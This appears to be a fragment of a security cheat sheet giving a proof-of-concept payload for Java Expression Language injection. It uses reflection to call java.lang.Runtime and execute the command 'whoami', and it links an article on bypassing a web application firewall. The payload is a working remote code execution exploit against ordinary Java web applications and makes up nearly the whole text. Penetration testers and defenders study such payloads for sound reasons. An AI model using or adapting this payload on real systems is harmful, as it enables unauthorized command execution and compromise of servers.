Code Exec Poc without <T>:
<T>
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("jav a.lang.Runtime")).exec("whoami")}
https://pulsesecurity.co.nz/articles/EL-Injection-WAF-Bypass
Last updated 1 year ago